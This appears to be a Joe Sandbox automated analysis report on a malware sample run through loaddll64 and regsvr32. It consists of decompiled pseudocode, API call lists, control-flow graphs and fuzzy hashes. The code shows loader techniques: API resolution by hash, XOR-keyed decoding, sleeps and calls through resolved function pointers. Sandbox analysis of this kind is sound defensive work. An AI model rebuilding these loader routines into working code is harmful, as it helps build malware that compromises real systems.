                                				if (E00000201201640C47B8(_t99, _t140, _t143, _t57, _t177) != 0) goto 0x640c301c;
                                				asm("lock or dword [edi+0xec], 0x1");
                                				_t142 = _t140 * 0x23c34600 + _v88;
                                				 *((long long*)(_t170 + 0x58)) = _t142;
                                				if (_v104 == 0) goto 0x640c308e;
                                				HeapFree(??, ??, ??);
                                				if (_t99 == 0) goto 0x640c304e;
                                				if (_t99 != 0x10d2) goto 0x640c308e;
                                				E00000201201640C908C(0x4a75e5e7, _t142,  *((intOrPtr*)( *0x640cd458 + 0x10)));
                                				if (_t142 == 0) goto 0x640c3067;
                                				 *_t142();
                                				 *(_t170 + 0x98) =  *(_t170 + 0x98) & 0x00000000;
                                				 *(_t170 + 0x9c) =  *(_t170 + 0x9c) & 0x00000000;
                                				E00000201201640C908C(0x8d72aad2, _t142,  *((intOrPtr*)(_t203 + 0x10)));
                                				if (_t142 == 0) goto 0x640c308e;
                                				 *_t142();
                                				return _t99;
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID: uJ
                                • API String ID: 3901518246-2850656762
                                • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction ID: bc0662030675e0f4f8cfa9e1ddb000a9ee75fa6338ef3475cffa78a58856b3fd
                                • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction Fuzzy Hash: 5681A0326007A0D7EB24DB12E849BDE73A8F788784F504029FF4947B8ADB3AD465CB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E00007FFC7FFC130F20A8(signed int __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed int* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
                                				void* _t43;
                                				signed int _t52;
                                				void* _t53;
                                				void* _t61;
                                				signed int _t64;
                                				signed char _t66;
                                				signed char _t75;
                                				signed int _t76;
                                				void* _t100;
                                				signed int _t109;
                                
                                				_t75 = __edx;
                                				_a8 = __rbx;
                                				_a24 = __rbp;
                                				 *__rcx = 0;
                                				r14d = r9d;
                                				_t76 = __edx;
                                				if (__eflags == 0) goto 0x130f211a;
                                				if (__eflags == 0) goto 0x130f20f9;
                                				if ((__edx & 0x00000003) - 1 == 1) goto 0x130f20f2;
                                				_t43 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t43);
                                				goto 0x130f211f;
                                				goto 0x130f211f;
                                				asm("sbb eax, eax");
                                				goto 0x130f211f;
                                				__rcx[1] = 0x80000000;
                                				_t52 = _t76 & 0x00000700;
                                				if ((_t75 & 0x00000008) == 0) goto 0x130f218b;
                                				if (_t52 == 0x100) goto 0x130f2184;
                                				if (_t52 == 0x200) goto 0x130f217d;
                                				if (_t52 == 0x300) goto 0x130f2176;
                                				if (_t52 == 0x400) goto 0x130f218b;
                                				if (_t52 == 0x500) goto 0x130f216f;
                                				if (_t52 == 0x600) goto 0x130f217d;
                                				_t100 = _t52 - 0x700;
                                				if (_t100 == 0) goto 0x130f216f;
                                				_t53 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t53);
                                				goto 0x130f2190;
                                				goto 0x130f2190;
                                				goto 0x130f2190;
                                				goto 0x130f2190;
                                				goto 0x130f2190;
                                				__rcx[2] = 3;
                                				if (_t100 == 0) goto 0x130f21e2;
                                				if (_t100 == 0) goto 0x130f21db;
                                				if (_t100 == 0) goto 0x130f21d4;
                                				if (_t100 == 0) goto 0x130f21cd;
                                				if (_t100 == 0) goto 0x130f21be;
                                				_t61 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t61);
                                				goto 0x130f21e4;
                                				sil = __rcx[1] == 0x80000000;
                                				goto 0x130f21e4;
                                				goto 0x130f21e4;
                                				goto 0x130f21e4;
                                				goto 0x130f21e4;
                                				__rcx[5] = __rcx[5] & 0x00000000;
                                				bpl = 0x80;
                                				__rcx[3] = 0;
                                				__rcx[4] = 0x80;
                                				if ((bpl & dil) == 0) goto 0x130f21fd;
                                				 *__rcx =  *__rcx | 0x00000010;
                                				if ((0x00008000 & _t76) != 0) goto 0x130f2225;
                                				if ((_t76 & 0x00074000) != 0) goto 0x130f2222;
                                				if (E00007FFC7FFC130F4DDC(_t75, __rax,  &_a16) != 0) goto 0x130f229b;
                                				if (_a16 == 0x8000) goto 0x130f2225;
                                				 *__rcx =  *__rcx | bpl;
                                				if ((0x00000100 & _t76) == 0) goto 0x130f2245;
                                				_t64 =  *0x13124dd4; // 0x0
                                				_t66 =  !_t64 & r14d;
                                				if ((bpl & _t66) != 0) goto 0x130f2245;
                                				__rcx[4] = 1;
                                				_t109 = dil & 0x00000040;
                                				if (_t109 == 0) goto 0x130f2259;
                                				asm("bts dword [ebx+0x14], 0x1a");
                                				asm("bts dword [ebx+0x4], 0x10");
                                				__rcx[3] = __rcx[3] | 0x00000004;
                                				asm("bt edi, 0xc");
                                				if (_t109 >= 0) goto 0x130f2262;
                                				__rcx[4] = __rcx[4] | 0x00000100;
                                				asm("bt edi, 0xd");
                                				if (_t109 >= 0) goto 0x130f226d;
                                				asm("bts dword [ebx+0x14], 0x19");
                                				if ((dil & 0x00000020) == 0) goto 0x130f227a;
                                				asm("bts dword [ebx+0x14], 0x1b");
                                				goto 0x130f2285;
                                				if ((dil & 0x00000010) == 0) goto 0x130f2285;
                                				asm("bts dword [ebx+0x14], 0x1c");
                                				return _t66;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo$_get_daylight
                                • String ID:
                                • API String ID: 72036449-0
                                • Opcode ID: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction ID: a29df5b4091cd437e0b99f029867bc5ddfa8e1a5fa130d5ab96c2e0768c50546
                                • Opcode Fuzzy Hash: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction Fuzzy Hash: 6551A12AE0CE2F43F7A9692C8E0137A66DCBB50738F194475DB0D661D6CA2CE860C665
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E00007FFC7FFC130EF0D4(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                                				void* _t4;
                                				void* _t9;
                                				intOrPtr _t11;
                                				intOrPtr _t14;
                                				void* _t23;
                                				void* _t29;
                                				void* _t32;
                                				void* _t33;
                                
                                				_t29 = __rdx;
                                				_t27 = __rcx;
                                				_t25 = __rbx;
                                				_t23 = __rax;
                                				_a8 = __rbx;
                                				GetLastError();
                                				_t11 =  *0x13123888; // 0x4
                                				if (_t11 == 0xffffffff) goto 0x130ef0fe;
                                				_t4 = E00007FFC7FFC130EF5BC(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
                                				if (__rax != 0) goto 0x130ef13f;
                                				E00007FFC7FFC130EE26C(_t4, _t27, _t29);
                                				_t32 = _t23;
                                				if (_t23 != 0) goto 0x130ef11e;
                                				E00007FFC7FFC130EE114(_t23, _t27);
                                				goto 0x130ef15a;
                                				_t14 =  *0x13123888; // 0x4
                                				if (E00007FFC7FFC130EF614(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x130ef117;
                                				E00007FFC7FFC130EEE40(_t32, _t23);
                                				_t9 = E00007FFC7FFC130EE114(_t23, _t32);
                                				if (_t32 == 0) goto 0x130ef15a;
                                				SetLastError(??);
                                				return _t9;
                                			}

                                APIs
                                • GetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF0DE
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF146
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF15C
                                • abort.LIBCMT ref: 00007FFC130EF162
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ErrorLast$abort
                                • String ID:
                                • API String ID: 1447195878-0
                                • Opcode ID: 7a012ae045e6c987bb9a3b7d4f0e6a1a7c22592a596a8c6bb60e7afd6d044707
                                • Instruction ID: ce5543993cea57cd4835e1aa8729aae120ec9e7bb04bd31614269084bfa2f0fb
                                • Opcode Fuzzy Hash: 7a012ae045e6c987bb9a3b7d4f0e6a1a7c22592a596a8c6bb60e7afd6d044707
                                • Instruction Fuzzy Hash: 99019224B0AF6E42FA586774A55613821D18F487B8F25093CD91E267C2ED2CF869C230
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID:
                                • API String ID: 2332451156-0
                                • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction ID: d10adf1a3fabbeb5f469c394372a043e78e5b5e1de6808fb2d2d51f08e062f9d
                                • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction Fuzzy Hash: 38214129201B74C3EB58DB66DD493A963A9EB89FC4F585015AF0D5379ECF36C492C304
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                control_flow_graph 101 735638-735687 call 73908c 104 735691-7356a2 call 73908c 101->104 105 735689-73568f SleepEx 101->105 108 7356a4 104->108 109 7356ab-7356eb call 735ba4 call 7313ec 104->109 105->104 108->109 114 7356f1-735706 call 73908c 109->114 115 7359e0-7359f9 109->115 118 735711 114->118 119 735708-73570f 114->119 120 735713-735722 call 73908c 118->120 119->120 124 735724-73572c 120->124 125 73572e 120->125 126 735731-735747 HeapAlloc 124->126 125->126 128 7359d2-7359da HeapFree 126->128 129 73574d-73576b call 7347b0 126->129 128->115 132 7357a3-7357b3 call 73a238 129->132 133 73576d-735774 129->133 137 7357b8-7357ba 132->137 133->132 134 735776-73579e call 7347b0 * 2 133->134 134->132 139 7357c0-7357e1 call 73908c 137->139 140 7359c4-7359cc HeapFree 137->140 144 7357e3-7357e8 139->144 145 7357ea 139->145 140->128 146 7357ec-73580b HeapAlloc 144->146 145->146 148 735811-73584c call 735ba4 call 7313ec 146->148 149 7359b6 146->149 155 735852-735893 call 73b158 HeapFree 148->155 156 7359a8-7359b0 HeapFree 148->156 150 7359b9-7359be HeapFree 149->150 150->140 159 7359fa-7359ff 155->159 160 735899-7358a2 155->160 156->149 159->140 160->159 161 7358a8-7358c7 call 737cf4 160->161 161->156 164 7358cd-7358ee HeapAlloc 161->164 165 7359a3 164->165 166 7358f4-735931 call 735ba4 call 7313ec 164->166 165->156 171 735933-735993 call 73b158 * 2 166->171 172 735995-73599d HeapFree 166->172 171->150 172->165
                                C-Code - Quality: 31%
                                			E00735638(void* __ebx, void* __ecx, void* __ebp, long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r9, void* __r11) {
                                				void* __rbp;
                                				signed long long _t87;
                                				void* _t102;
                                				intOrPtr _t105;
                                				signed long long _t108;
                                				signed long long _t122;
                                				signed long long _t131;
                                				void* _t137;
                                				intOrPtr _t138;
                                				void* _t139;
                                				intOrPtr _t140;
                                				intOrPtr _t164;
                                				void* _t165;
                                				void* _t186;
                                				long long _t187;
                                				long long _t189;
                                				long long _t191;
                                				long long* _t193;
                                				long long _t231;
                                				void* _t236;
                                				long long _t245;
                                				long long _t246;
                                				void* _t247;
                                				void* _t248;
                                				void* _t263;
                                				void* _t268;
                                				long long _t271;
                                				void* _t272;
                                				long long _t274;
                                
                                				_t268 = __r11;
                                				_t263 = __r9;
                                				_t191 = __rbx;
                                				_t165 = __ebp;
                                				_t139 = __ecx;
                                				_t137 = __ebx;
                                				_t186 = _t247;
                                				 *((long long*)(_t186 + 0x10)) = __rbx;
                                				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
                                				 *((long long*)(_t186 + 0x18)) = __r8;
                                				 *((long long*)(_t186 + 8)) = __rcx;
                                				_push(_t236);
                                				_push(_t272);
                                				_t248 = _t247 - 0x50;
                                				_t243 =  *0x73d458;
                                				_t187 =  *0x73d448;
                                				 *((long long*)(_t248 + 0x38)) = _t187;
                                				_t164 = 0;
                                				E0073908C(0x38e683e4, _t187,  *((intOrPtr*)( *0x73d458 + 0x18)));
                                				if(_t187 != _t236) {
                                					_t9 = _t236 + 0xa; // 0xa, executed
                                					_t139 = _t9;
                                					SleepEx(??, ??); // executed
                                				}
                                				E0073908C(0x9c66d81c, _t187,  *((intOrPtr*)(_t243 + 0x18)));
                                				if(_t187 != _t236) {
                                					 *_t187();
                                				}
                                				_t12 = _t248 + 0x30; // -126
                                				_t87 = E00735BA4(_t12);
                                				_t13 = _t248 + 0x30; // -126
                                				r11d = _t87;
                                				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                				_t18 = _t268 + 3; // 0x3
                                				E007313EC(_t137, _t139, _t18, _t187, _t191, _t13);
                                				 *((long long*)(_t248 + 0x40)) = _t187;
                                				if(_t187 == _t236) {
                                					L34:
                                					return _t164;
                                				} else {
                                					r12d = 0xfb849f8f;
                                					E0073908C(r12d, _t187,  *((intOrPtr*)(_t243 + 0x18)));
                                					if(_t187 == _t236) {
                                						_t138 = _t164;
                                					} else {
                                						_t138 =  *_t187();
                                					}
                                					E0073908C(r12d, _t187,  *((intOrPtr*)(_t243 + 0x18)));
                                					if(_t187 == _t236) {
                                						r13d = _t164;
                                					} else {
                                						r13d =  *_t187();
                                					}
                                					_t23 = _t191 + 7; // 0x7
                                					r8d = _t272 + _t23;
                                					HeapAlloc(??, ??, ??);
                                					_t271 = _t187;
                                					if(_t187 == _t236) {
                                						L33:
                                						HeapFree();
                                						goto L34;
                                					} else {
                                						_t24 = _t191 + 1; // 0x1
                                						r8d = _t24;
                                						L007347B0();
                                						if( *((intOrPtr*)(_t248 + 0xa0)) != _t236) {
                                							_t173 =  *((intOrPtr*)(_t248 + 0xa8)) - _t164;
                                							if( *((intOrPtr*)(_t248 + 0xa8)) != _t164) {
                                								_t187 =  *((intOrPtr*)(_t248 + 0x38));
                                								r8d = 6;
                                								L007347B0();
                                								_t32 = _t272 + 1; // 0x1
                                								r8d = _t32;
                                								L007347B0();
                                							}
                                						}
                                						_t231 = _t271; // executed
                                						_t102 = E0073A238(_t139, _t165, _t173, _t191,  *((intOrPtr*)(_t248 + 0x90)), _t231, _t248 + 0x48, _t263); // executed
                                						if(_t102 != _t164) {
                                							L32:
                                							HeapFree();
                                							goto L33;
                                						} else {
                                							_t193 =  *((intOrPtr*)(_t248 + 0xb0));
                                							 *_t193 =  *((intOrPtr*)(_t248 + 0x48));
                                							E0073908C(0xfb849f8f, _t187,  *((intOrPtr*)(_t243 + 0x18)));
                                							if(_t187 == _t236) {
                                								_t105 = _t164;
                                							} else {
                                								_t105 =  *_t187();
                                							}
                                							 *((intOrPtr*)(_t193 + 0x10)) = _t105;
                                							_t41 = _t231 + 0x34; // 0x34
                                							r8d = _t41;
                                							 *((intOrPtr*)(_t193 + 0x14)) = 1;
                                							HeapAlloc(??, ??, ??);
                                							_t274 = _t187;
                                							if(_t187 == _t236) {
                                								L30:
                                								goto L31;
                                							} else {
                                								_t43 = _t248 + 0x30; // 0xfb849fcf
                                								_t108 = E00735BA4(_t43);
                                								_t44 = _t248 + 0x30; // 0xfb849fcf
                                								r11d = _t108;
                                								r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                								_t49 = _t268 + 3; // 0x3
                                								E007313EC(_t138, _t139, _t49, _t187, _t193, _t44);
                                								_t245 = _t187;
                                								if(_t187 == _t236) {
                                									L29:
                                									__eflags = 0;
                                									HeapFree(??, ??, ??);
                                									goto L30;
                                								}
                                								L0073B158();
                                								HeapFree(??, ??, ??);
                                								_t232 =  *((intOrPtr*)(_t248 + 0xa0));
                                								 *((long long*)(_t193 + 8)) = _t274;
                                								if( *((intOrPtr*)(_t248 + 0xa0)) == _t236) {
                                									L35:
                                									_t164 = 1;
                                									goto L32;
                                								}
                                								_t140 =  *((intOrPtr*)(_t248 + 0xa8));
                                								if(_t140 == _t164) {
                                									goto L35;
                                								}
                                								r8d = _t140;
                                								_t189 = _t193 + 0x28;
                                								 *((long long*)(_t248 + 0x20)) = _t189;
                                								if(E00737CF4(_t138, _t189, _t193,  *((intOrPtr*)(_t248 + 0x90)), _t232, _t245, _t193 + 0x18) != _t164) {
                                									goto L29;
                                								}
                                								r15d = 0x77;
                                								 *((intOrPtr*)(_t193 + 0x2c)) = 1;
                                								HeapAlloc(??, ??, ??);
                                								_t246 = _t189;
                                								if(_t189 == _t236) {
                                									L28:
                                									goto L29;
                                								}
                                								_t62 = _t248 + 0x30; // 0xfb849fcf
                                								_t122 = E00735BA4(_t62);
                                								_t63 = _t248 + 0x30; // 0xfb849fcf
                                								r11d = _t122;
                                								r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                								_t68 = _t268 + 3; // 0x3
                                								_t131 = E007313EC(_t138, _t140, _t68, _t189, _t193, _t63);
                                								 *((long long*)(_t248 + 0x48)) = _t189;
                                								if(_t189 == _t236) {
                                									__eflags = 0;
                                									HeapFree(??, ??, ??);
                                									goto L28;
                                								}
                                								L0073B158();
                                								r11d = _t131;
                                								r15d = r15d - r11d;
                                								 *((long long*)(_t248 + 0x20)) =  *((intOrPtr*)(_t248 + 0x38)) + 0x74129f;
                                								L0073B158();
                                								 *((long long*)(_t193 + 0x20)) = _t246;
                                								_t164 = 2;
                                								L31:
                                								HeapFree();
                                								goto L32;
                                							}
                                						}
                                					}
                                				}
                                			}

































                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • SleepEx.KERNEL32(00000000,00735217), ref: 0073568F
                                  • Part of subcall function 007313EC: HeapAlloc.KERNEL32 ref: 00731456
                                • HeapAlloc.KERNEL32 ref: 0073573B
                                • HeapAlloc.KERNEL32 ref: 007357FF
                                • HeapFree.KERNEL32 ref: 0073587E
                                  • Part of subcall function 00737CF4: HeapAlloc.KERNEL32 ref: 00737DB2
                                • HeapAlloc.KERNEL32 ref: 007358E2
                                • HeapFree.KERNEL32 ref: 0073599D
                                • HeapFree.KERNEL32 ref: 007359B0
                                • HeapFree.KERNEL32 ref: 007359BE
                                • HeapFree.KERNEL32 ref: 007359CC
                                • HeapFree.KERNEL32 ref: 007359DA
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLastSleep
                                • String ID:
                                • API String ID: 3047968389-0
                                • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction ID: 293b833d30d8b75fb84d702ee1fe12be6bd115982360f7b3260a7d42940c6340
                                • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction Fuzzy Hash: 0B91AF36314E80C6EB15DB26E94439AA7A2F7C9FC4F448512AE4E87B19DF3CDA46C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                C-Code - Quality: 45%
                                			E007337E0(void* __ecx, void* __edx, void* __edi, long long* __rax, long long __rcx, void* __r8, void* __r9, void* __r10) {
                                				void* __rbx;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				long _t80;
                                				long _t88;
                                				long _t89;
                                				void* _t90;
                                				long _t94;
                                				long _t98;
                                				long _t112;
                                				long _t113;
                                				long _t114;
                                				long _t119;
                                				long _t120;
                                				long _t121;
                                				long _t122;
                                				void* _t126;
                                				signed int _t135;
                                				void* _t151;
                                				void* _t152;
                                				long long _t153;
                                				long _t154;
                                				long long* _t167;
                                				long long* _t168;
                                				intOrPtr _t169;
                                				void* _t170;
                                				intOrPtr _t192;
                                				long long _t219;
                                				intOrPtr _t221;
                                				intOrPtr _t224;
                                				intOrPtr _t226;
                                				long long* _t227;
                                				void* _t228;
                                				void* _t229;
                                				void* _t233;
                                				void* _t234;
                                				void* _t237;
                                				long long _t239;
                                				void* _t240;
                                				long long* _t244;
                                				long long _t246;
                                				void* _t247;
                                				CHAR* _t252;
                                
                                				_t238 = __r10;
                                				_t237 = __r9;
                                				_t231 = __r8;
                                				_t167 = __rax;
                                				_t151 = __edi;
                                				_t126 = __ecx;
                                				 *((long long*)(_t228 + 8)) = __rcx;
                                				_push(_t170);
                                				_t229 = _t228 - 0x248;
                                				_t242 =  *0x73d448;
                                				_t221 =  *0x73d458;
                                				_t224 =  *((intOrPtr*)(_t221 + 8));
                                				 *((long long*)(_t229 + 0x20)) =  *0x73d448;
                                				 *(_t229 + 0x298) =  *0x73d450;
                                				GetModuleHandleA(_t252);
                                				_t215 = _t221 + 0x18;
                                				_t80 = E007340F8(__rax, _t221 + 0x18, __r8, __r10, _t247, _t244);
                                				r13d = 0;
                                				_t124 = _t80;
                                				if(_t80 == r13d) {
                                					E0073908C(0xa30cd0f3, _t167,  *((intOrPtr*)(_t221 + 0x18)));
                                					if(_t167 == _t244) {
                                						_t167 = _t244;
                                					} else {
                                						 *_t167();
                                					}
                                					_t215 = _t221 + 0x10;
                                					_t119 = E007340F8(_t167, _t221 + 0x10, _t231, _t238);
                                					_t124 = _t119;
                                					if(_t119 == r13d) {
                                						_t215 = _t221 + 0x28;
                                						_t120 = E00735FC8(_t124, _t167, _t170, _t242 + 0x741082, _t221 + 0x28, _t221, _t224, _t238); // executed
                                						_t124 = _t120;
                                						if(_t120 == r13d) {
                                							_t215 = _t221 + 0x20;
                                							_t121 = E00735FC8(_t124, _t167, _t170, _t242 + 0x741079, _t221 + 0x20, _t221, _t224, _t238); // executed
                                							_t124 = _t121;
                                							if(_t121 == r13d) {
                                								_t215 = _t221 + 0x30;
                                								_t122 = E00735FC8(_t124, _t167, _t170, _t242 + 0x741092, _t221 + 0x30, _t221, _t224, _t238); // executed
                                								_t124 = _t122;
                                							}
                                						}
                                					}
                                				}
                                				if(_t124 != r13d) {
                                					L76:
                                					return _t124;
                                				}
                                				HeapAlloc();
                                				_t219 = _t167;
                                				if(_t167 == _t244) {
                                					_t124 = 8;
                                					goto L76;
                                				}
                                				_t233 = _t170;
                                				E0073487A();
                                				E0073908C(0x9ffc4c27, _t167,  *((intOrPtr*)(_t221 + 0x10)));
                                				if(_t167 != _t244) {
                                					 *_t167();
                                				}
                                				_t24 = _t219 + 0xa8; // 0xa8
                                				_t168 = _t24;
                                				 *_t168 = _t168;
                                				 *((long long*)(_t219 + 0xb0)) = _t168;
                                				 *(_t219 + 0x9c) = r13d;
                                				 *(_t219 + 0xa0) = r13d;
                                				 *(_t219 + 0x98) = r13d;
                                				E0073638C(_t126, _t168, _t170, _t221);
                                				E0073908C(0xdc444c2b, _t168,  *((intOrPtr*)(_t221 + 0x18)));
                                				if(_t168 == _t244) {
                                					_t168 = _t244;
                                				} else {
                                					r9d = 0;
                                					r8d = 0;
                                					_t126 = 0;
                                					 *_t168();
                                				}
                                				 *((long long*)(_t219 + 0x28)) = _t168;
                                				if(_t168 != _t244) {
                                					_t250 =  *0x73d458;
                                					r8d = 0x1102;
                                					HeapAlloc(??, ??, ??);
                                					_t153 = 0;
                                					_t246 = _t168;
                                					_t34 = _t224 + 0x7f; // 0x7f
                                					r12d = _t34;
                                					__eflags = _t168 - _t224;
                                					if(_t168 == _t224) {
                                						_t124 = 8;
                                						L36:
                                						r13d = 0;
                                						__eflags = _t124 - r13d;
                                						if(_t124 != r13d) {
                                							goto L74;
                                						}
                                						_t226 =  *0x73d448;
                                						_t47 = _t246 + 8; // 0x8
                                						r8d = _t47;
                                						L007347B0();
                                						_t215 = _t229 + 0x2a0;
                                						_t234 = 0x730000 + _t226 + 0x11188;
                                						 *((intOrPtr*)(_t229 + 0x2a6)) = r13w;
                                						_t88 = E0073A0AC(_t124, _t126, _t170, _t219, _t229 + 0x2a0, _t219, _t221, _t226, _t234); // executed
                                						_t124 = _t88;
                                						__eflags = _t88 - r13d;
                                						if(_t88 != r13d) {
                                							_t234 = 0x730000 + _t226 + 0x111e0;
                                							_t215 = _t229 + 0x2a0;
                                							_t124 = E0073A0AC(_t124, _t126, _t170, _t219, _t229 + 0x2a0, _t219, _t221, _t226, _t234);
                                						}
                                						__eflags = _t124 - r13d;
                                						if(__eflags == 0) {
                                							_t57 = _t219 + 8; // 0x8
                                							_t215 = _t57;
                                							_t89 = E00735058(_t126, __eflags, _t168, _t170, _t219, _t215, _t221, _t226, _t234, _t238);
                                							_t124 = _t89;
                                							__eflags = _t89 - r13d;
                                							if(_t89 == r13d) {
                                								_t124 = 8;
                                								E0073405C(_t170, _t219, _t215, _t219, _t221, _t226);
                                								 *((long long*)(_t219 + 0x30)) = _t168;
                                								__eflags = _t168 - _t246;
                                								if(_t168 != _t246) {
                                									_t59 = _t219 + 8; // 0x8
                                									E0073405C(_t170, _t59, _t215, _t219, _t221, _t226);
                                									__eflags = _t168 - _t246;
                                									 *((long long*)(_t219 + 0x38)) = _t168;
                                									_t124 =  !=  ? r13d : 8;
                                								}
                                							}
                                							__eflags = _t124 - r13d;
                                							if(_t124 == r13d) {
                                								_t90 = E0073A7A0(_t151, _t168, _t170, _t219, _t215, _t237); // executed
                                								__eflags = _t90 - r13d;
                                								if(_t90 != r13d) {
                                									_t169 =  *((intOrPtr*)(_t229 + 0x20));
                                									r9d =  *(_t229 + 0x298);
                                									_t239 = _t169 + 0x73f000;
                                									r8d =  *(_t239 + 2) & 0x0000ffff;
                                									_t135 = r9d ^ 0xe49a1e6d;
                                									__eflags = _t169 - _t234 + 8;
                                									if(_t169 <= _t234 + 8) {
                                										_t168 = _t246;
                                									} else {
                                										_t168 = _t234 + _t239 + 8;
                                										__eflags = _t135 - r13d;
                                										if(_t135 != r13d) {
                                											E00734D70(_t135, _t168);
                                										}
                                									}
                                									__eflags = _t168 - _t246;
                                									if(_t168 != _t246) {
                                										r9d = r9d ^ 0xecb028fc;
                                										E0073A8E8(r9d, _t168, _t239, _t237);
                                										__eflags = _t168 - _t246;
                                										if(_t168 == _t246) {
                                											goto L51;
                                										}
                                										 *((long long*)(_t219 + 0x40)) = _t239;
                                										 *0x73d440 = _t219;
                                										E0073908C(0xa30cd0f3, _t168,  *((intOrPtr*)(_t221 + 0x18)));
                                										__eflags = _t168 - _t246;
                                										if(_t168 == _t246) {
                                											_t168 = _t246;
                                										} else {
                                											_t126 = 0;
                                											 *_t168();
                                										}
                                										__eflags = _t168 -  *((intOrPtr*)(_t229 + 0x290));
                                										if(_t168 ==  *((intOrPtr*)(_t229 + 0x290))) {
                                											asm("lock add dword [esi+0x38], 0x1");
                                											_t94 = E00739D6C(_t124, _t126, 0xa30cd0f3, _t152, _t170, _t219, _t234, _t237, _t239, _t240);
                                											goto L72;
                                										} else {
                                											E0073908C(0x9f72cbe0, _t168,  *((intOrPtr*)(_t221 + 0x18)));
                                											__eflags = _t168 - _t246;
